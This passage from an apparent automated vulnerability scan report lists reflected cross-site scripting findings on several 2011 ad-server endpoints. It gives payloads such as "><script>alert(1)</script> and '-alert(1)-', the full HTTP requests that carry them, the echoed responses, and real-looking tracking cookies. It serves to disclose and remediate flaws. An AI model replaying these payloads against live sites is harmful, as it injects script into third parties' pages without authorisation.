User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:59 GMT
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:59 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Content-Length: 7918

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-31434394_1304949599","http://ad.doubleclick.net/adj/q1.q.gc.6170db5a3'-alert(1)-'52fdd678b0b/news;net=q1;u=,q1-31434394_1304949599,11f8f328940989e,polit,am.h-am.b-q1.polit_h-q1.none_l-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;sz=728x90;net=q1;ord1=275382;contx=polit;dc=w;btg=am.h;btg=am.b;btg=q1
...[SNIP]...

3.19. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52ba9'-alert(1)-'5fe36e29226 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170/news52ba9'-alert(1)-'5fe36e29226;sz=728x90;net=q1;ord=949588501;ord1=275382;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:00 GMT
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 14:00:00 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 14:00:00 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 14:00:00 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 14:00:00 GMT
Content-Length: 7918

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-82061945_1304949600","http://ad.doubleclick.net/adj/q1.q.gc.6170/news52ba9'-alert(1)-'5fe36e29226;net=q1;u=,q1-82061945_1304949600,11f8f328940989e,polit,am.h-am.b-q1.polit_h-q1.none_l-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;sz=728x90;net=q1;ord1=275382;contx=polit;dc=w;btg=am.h;btg=am.b;btg=q1.poli
...[SNIP]...

3.20. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3685b'-alert(1)-'43c09f146d7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170/news;sz=3685b'-alert(1)-'43c09f146d7 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:58 GMT
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:58 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:58 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:58 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:58 GMT
Content-Length: 7872

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
dAttachAd("q1-64798750_1304949598","http://ad.doubleclick.net/adj/q1.q.gc.6170/news;net=q1;u=,q1-64798750_1304949598,11f8f328940989e,none,q1.polit_h-q1.none_l-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;sz=3685b'-alert(1)-'43c09f146d7;contx=none;dc=w;btg=q1.polit_h;btg=q1.none_l;btg=dx.16;btg=dx.23;btg=dx.17;btg=cm.ent_h;btg=cm.music_h?","3685b'-alert(1)-'43c09f146d7","",false);</scr'+'ipt>
...[SNIP]...

3.21. http://ad.doubleclick.net/adj/cm.tribune/uscell_ldev_300x600_05311 [net parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of the net request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9931f'%3balert(1)//b7beab04221 was submitted in the net parameter. This input was echoed as 9931f';alert(1)//b7beab04221 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Note that the payload was submitted with the semicolon URL-encoded (%3b) and came back decoded, so the server URL-decodes the value before writing it into the document.write string; any escaping must therefore be applied to the decoded value that is actually placed in the string literal, not to the raw query string. The trailing // in the payload comments out the rest of the statement, which is why the injected alert(1) runs without a syntax error even though the remainder of the original string is left dangling.

Request

GET /adj/cm.tribune/uscell_ldev_300x600_05311;net=9931f'%3balert(1)//b7beab04221 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 298
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:00:03 GMT
Expires: Mon, 09 May 2011 14:00:03 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/u;44306;0-0;0;63773644;255-0/0;0/0/0;;~okv=;net=9931f';alert(1)//b7beab04221;~aopt=2/1/e454/0;~sscs=%3f"><img
...[SNIP]...

3.22. http://ad.doubleclick.net/adj/trb.orlandosentinel/biz [;ptype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.orlandosentinel/biz

Issue detail

The value of the ;ptype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7438'%3balert(1)//81202d971f6 was submitted in the ;ptype parameter. This input was echoed as c7438';alert(1)//81202d971f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.orlandosentinel/biz;;ptype=c7438'%3balert(1)//81202d971f6 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2234
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 13:59:55 GMT
Expires: Mon, 09 May 2011 13:59:55 GMT

document.write('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<MobileCreative adId=\"236335382\" clientSideImpressionTracking=\"false\"\n templateVersion=\"1.2\">\n    <Properties>\n     <Cre
...[SNIP]...
<![CDATA[http://ad.doubleclick.net/imp;v7;j;236335382;0-0;0;12928091;2000/2000;40669971/40687758/1;;~aopt=2/1/880a/1;~okv=;;ptype=c7438';alert(1)//81202d971f6;~cs=a%3f]]>
...[SNIP]...

3.23. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0bfe"><script>alert(1)</script>10708fa3251 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=a0bfe"><script>alert(1)</script>10708fa3251 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=Dza9cImQIgAOYp1sdVBFKJ3j2mm-3nw5DLdjMDY9RiDfaqaDzVRu9ZiuBStYaftY-vQa-Lrt8AEh2sMWSofalPWfoLMBxH0g9IiAwEZtd5YPMEpw2Dimbl_Ar_3pbVlWCr9zpcNmhJ4YALFsRS0OjTgV6OPboE5AailwYD2p-IySdlkZutLQ7ZQ85RG7C4VB2qlA743KvZ39ywpdZbpMhh0Lmtiu91APHHd__cAh9gz07Cd5Zg6Jg2z-OuW7NiYiFK2x3qhPSvxxgQjvFMzvNsv0sG_uSycuZycGHG0i9JDVJjS_HVyCCR3CpH4C_z7OWENSx6qTFa7od7SUHN9Egei6BZRgi_D5YzTOICCuYCx9jiGo5Ucxoan5H4AQ_xV3iHql4u4O7_sSYdnd02k2DNQHkfpT4yC0sBHWKifDZRo8VXe-PeWk1nfFtbmH7GvZ1QMXO5GUno07zoygwBocRoTsxUcxWk5nbrSqN6k58j1TORmwcQ4tlm0RwihyF_UsCL2x9N8rCbkNMc9dtlOLKF16IBansyDt77nh-l623XjbgLPXgE5UhrKbb-yapi7Iz_t1m3RC9HNVGEroWY24Hx0ymz9iB_PZ274hwZ5aW0QB1cBEZ955Qck8jqa4MZ7v1aY1ttiEjhYPnmeJ7sqVaGWGUflWpKK8ZDluGXe-OMAMpHNeDinV6bUD4c7xTKPYqOV7QZ7aFBA3m0phFzvLGUyTINTvrbznNuEHAKkRnaoKqQQIp4dB6WERi9SKRUeAKB26GseFkfH7OU-Y9jArFwJN1aNKu26HMlC2vlBlEo3AibJolRtP9GKY2j0AIA4QF0ROUKwFAxzf5GHHC-l2sUbwMrieaxWXba1ERSK3tWWrKuMIkiwSl3Te1VhilaTSnNbIlFewbQ0HwOyAYWPKVOFzsrgdqMMSA-afxC3bSvIKc60386S8NF-JuqnS_gYeiHql4u4O7_sSYdnd02k2DGktwZFEgr-H1aRa-v8iL2Y8VXe-PeWk1nfFtbmH7GvZojS9aaLdC4dIDTz1p5oDzGZlZrZQz9gqPi_YpBWRR_zyJstfeR3BF0X80yINyf_bnscLz8pWZl03MCHITMyErF16IBansyDt77nh-l623XgQrvHzCa6-Ar3OKf1u5O9co8jF4KazkjYUhi9Y-2cpubMeTwvrsn6UDDgstfmlQPoNQYQoyiD68kJjw-yNw0ZU1aY1ttiEjhYPnmeJ7sqVaHrw4FE_cCyjpsbZ3unV7uMrdoKrhpnovF-eFvpriEhVrMfpGoruuBgzA1-jEhdCS2wFnaEJ_77D-SBSvq4apv0KqQQIp4dB6WERi9SKRUeApAoLbAXgH3MAg4fG-53hwYWvZ7p1zrzJVM0-BhBuMNYrc7Kk7dBes7lnotHfeZ9VkUKGgPT-wupZmNTexU6iznjzwSpHwNAhjAO4xxi375pcdR85v5iezdnNkxnuNwjFRvAyuJ5rFZdtrURFIre1ZZBSlbvBC0evnYqUUsRvAsWc1siUV7BtDQfA7IBhY8pUNZFdTBAhalBFYq3Dyxi9TBfNNCsQZvwCdk93ue_PwR2IeqXi7g7v-xJh2d3TaTYMVxQyOpakzryCsBb1QMcxxTxVd7495aTWd8W1uYfsa9lUSQm6Px99bWr2RVRxuk2yEM0JJ22tYCLP7uBw8UeaI1M5GbBxDi2WbRHCKHIX9Sz_QtJiSnym5S_qsqKzl484XXogFqezIO3vueH6XrbdeBrsNvqpBtQW35VrocWM1hJEMrVYqmvz7xJtELJ71uRTTECD0HA2vYVMATXXOR4kic7TP4ECMD5bQt22Ufb1ASjVpjW22ISOFg-eZ4nuypVoX3-sqUKgtXKTyeeAJ3WoNBTpFHNeMdsJNdx7bmFAC56JAHYn97lyiGJ5XDJCkUNkw_be5i-Fx9NF-BKeFGAMPAqpBAinh0HpYRGL1IpFR4AB4o7EViaAPEO7EwRwS
KXjmcb3GKio9SBOsgaqPfeFsasCu54shXpdyVhXu91m5wiW91g1mAzej0c7wnGxz5vZRvAyuJ5rFZdtrURFIre1ZfDRnDTWzff-YlyXP_zUgfGc1siUV7BtDQfA7IBhY8pUeWxnJe61Raa9uTyiNiaLtdI3rxLW4kElZ2z2lu4o7hWIeqXi7g7v-xJh2d3TaTYML11pzoZIlFkYCIGVGm_tUjxVd7495aTWd8W1uYfsa9nlK9dyZVYIz5pmDpzdU80QQkZpM_cVFXYTcTTPOspL-TBLfO2ZZ5wOsMI8xMfjrvrnuyo8Yez2B_AzlVUYglieXXogFqezIO3vueH6XrbdeOZqLTJ2eUC5VtOBQseHiE81nClsShNFF0lz8B3FOROwHTKbP2IH89nbviHBnlpbRDDco7mBS3_DJ0ZnqsKZKeTVpjW22ISOFg-eZ4nuypVotMax7cw1A0lomZOewLLuUzHWvz6IKIMXKnKL80iX025NYG1qkKS0O8LGs7luRUbTpMVbMDENDpvIJh2_kOeZwWW0-b-WJf0ZFlMOgj84vlCimF9cP6eLyeThS4cELoZF7hIMY-yiS6od8aiwiVy6K8hyJ0-yKCmYc6DEnkoIDjLUURQ9jCbj0adNONAbHq6OIauKDPsVyaYkWyAz1a3QLsZ0HFEk9FUwZlIZoC4PKchFMfXO25PtkA1FJuDF1eIqRRk7NbH_3KXaXpegXdoohM0M5HiSWAEvqit8JfBxvjBBCecmNOFvmnxZXlybKUM3qIhRpr8zAond1hyHy2KCxQ9jRTaSUh9q8NAYC-8-qkSZEZsmx23qKVCrqZDyeipaIi4-WrfUh7IPblkcEwLIfWk4JnPVlR_zGm4PPqzfx4-ZPuIxR87K17SR-59M9UpIVvIMltY5lVfKu7zjIgIpMBKB2P8TaeZb5SMS1Kn2fJf0-MGZW4U9vWHTndk9ZYnTYKRbzB2AW8sPYtx1gLnWIDsYBLT8b4yTE_t-fjXYNBuH2MTsqi1WP1f5naPDjKNVGGv49osHpNOU5hR-g_XrO60jJc9MudtXKgUybYsjSwmSw3Whqt4otLu1R9f4pMroY6TrnX9AFtcCOq4KtB3OqN2gLia6NWPazuloW1Dp_gmgtfmkSSGnmz7Ck--msIbUItDCaX4V_0YzpDgobT5myGAQ1jpLDCI7HiZjNNO0_95EX9SUHeo0SvSjgEUZJK2gWAKmardOPRrryF1DhECcp1-YMQnoV4ZAArTQ0YurxnNN6cMRpOMh2nE5XzpH9jU_75X6gaFQNyuWz4EiPqighnBW1K7ySrDy2erbCyocIlO9iKCeGUvo-FRYRZN7b2HzshKpWim7EvVYj9LxNPbnlLRl7SF6Fz-Cqk4ilR2m1sd6XpoV6J-HdTmFEl8Fex_S_sTGaqkuGDnpWV_Epn14CgCD-1Od2j93-G993DJLn6laQk0A_YEjXCNxN4ufXJe2s8taXVc1ZwCaKwQ-ReuFBa_BvA0MPyd7JlyBvMOrx4RsY1dMYwNR_ohNoy9a29HQKTTBeSdexy7NjxMrQdbG848mPsvXEVp1Zp9tlw0PafTHwRamGgGanwtSRVH2wEa3NxSTCsrM00Brun6QttnrZ4i40yYFMUM2IND36b7ZFw4; fc=qPpK4X8K7ZjxVx0VJZDcdB_D1mN3lHI_BinJ1LdrOAbDh9xILOy7cWXWYifPzZ3iZjzoSdlEeqq3zCQrton2D32iD1a2418t8vlUtDGalV-JhisFugd5-2PmgEb-dzYcx_84B0Gt7iZQiKNqGC2CofHgZs6hnwrt4AvKtyKV8klPR1hRXEWvUhiTNhz33U4d9hTEpcCaiTjdUImk_rGRYl95QzLPGgcS4PLuvzPSDFoeX72gpvVoMR_dT1IU83itQkcPCNDBJR1s8ojl7c8L5k9KWBxjpL-6lYKR74fQmyE; 
pf=WmCQSJv_88YAF1TaCEjacvtFyKtKd3nkimHPVBGJrCArW05u4B9BwnHxy5LHSNbs0PyvhiQ9hEGFvp1qMvxzBcdiicNNmmE_aI2n_-oR-aRG9eqUO6PdyPlHytyWBeL6pt4N9d3OY-Qo6M3zGftguNTbm-VGCKrn7KG61o8a-hlxQgbL-MXnxJnxbWK81XM2fNbwnskl80J7FrpArydV4msv5xJnc6wiNkkgoc9ZHAqEvAXfc_b9CYsOLM4ObfRS-yQ0IxDS6yGV0bt0Oz4pJzQ3Hu9GorHJq3pkzhhXE4dM0xncvVUD6tMlnnlm_qWsojASvNxNlCtZvel71OhRg1_acYxwuGBwWmnpT3WVNmeWKUlZO7GlHHuYkG_xUYpdlRr7vUCIaoiDaMmpt_PvLCOUyLGtO0hHJuwGY5T09JX2RCeAmas1by9-2jjXtHbxIU6XTk6RPEnQXT9x2zEmWfAeEJZ2W4XMeMQpqzhWB_34UH3sPqU14UWUW_0z8Z0heNyepssmwJo9AEHB3dcHG8NqNopQF7bmOYrUClo2LIAxUFIqqMfzF-f5IilV9DF2EEtf1qwB8GY1P6ISMC2NEE-NukVybOAFf3snxZsusnThrdw025CqgpXbAJf_ZgK04z5LE7vpNsVQaepPKy5giom1bq2yFvVGruUD-0Zmu_IOz-UlYiPBN7JyoSoKGJwMowB-sj_YCAwsoyO3MSAriA-6SvpE8vfm17M_AiAxw4nAd1Y9GjRixW8BKZaPBicaTSnQ_qW1THdHtsDrSOwE7yWjUosqwui97JSt4J0g_MOMd0ReLIPTEksHwzd4gYkpoMm2n6Nulr0bAVvGt4WcZWdCKTjb3Ww3q4Lyh_VyGMuPK371XlXjo5X46eVqRbV699MOJ5eDdshYLSs5LFoOgILjO_vdFh0XnPmUquTICkH1HrsiJSZNWOX0SyN8dywaeYYZUTlRetsuBzMcxMWLQLNyiRU1bJ5Qpb7GomgPhXBwcMjXa09KP5HzekSxDcQK0SJw0JMmSyeQM3pYTVx-Ci-FU5aKfMy17HNvPHxNvxNrRXY1izURX-lyALi1AlxuBXTDiJUS-OqKWjm2DD4CuggKG3dUzHMmu04fSX5Ad4nEc6NlGzZLMuoExgCCt30kp2pmOmYcQYMZyZ05DubgihMl8PJOwcr8ldScAKqk7rGGnUh27gMWCyrnP1Di5AGzTucfcXTrqV1UJKyBhGxFYcQFai9M2J3rqJmFUgQdN5ATDIRwfK3uozaJUKhU4qVipaL_GD-TOTelik5DYCvXIYIInb3nfIa-ebQa7olHWWH486R4yxje4LN8GWCWWRe4IR0I9DtTjuVzRJkyZ8n66XpUPlCRi3tlvuMEH6BKrtjGsUA2wOoIXFuaM_JUwMHDgab4_aPrZdgl9Uf7tvD9rgyRTxnR6YKNm8Gu6ALXRmCYGTIP8i-wsqx8QkqNgi0F_hs9UZaVZDpy-HyTAsx-Y51cz4yJITcb0FaAWC4QbaWSbbOECFNVbSmOiTVVH4eEKD1WvX5M7UplxrzwIhN9Mwkgo1sMiNanUUl1UyNj_Qxjp4iBCha2ShvDZxpY4-NTPO_cWHxychz2AkV4XXIJ0g; uid=2931142961646634775; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C7%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7C1007%7C1008; rds=15093%7C15093%7C15093%7C15104%7C15085%7C15097%7C15097%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7C15097%7C15093; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 14:00:11 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:11 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4537377354125894831&fpid=a0bfe"><script>alert(1)</script>10708fa3251&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.24. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f258"><script>alert(1)</script>bb97804a671 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=468x60&section=1384085&2f258"><script>alert(1)</script>bb97804a671=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!?!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; 
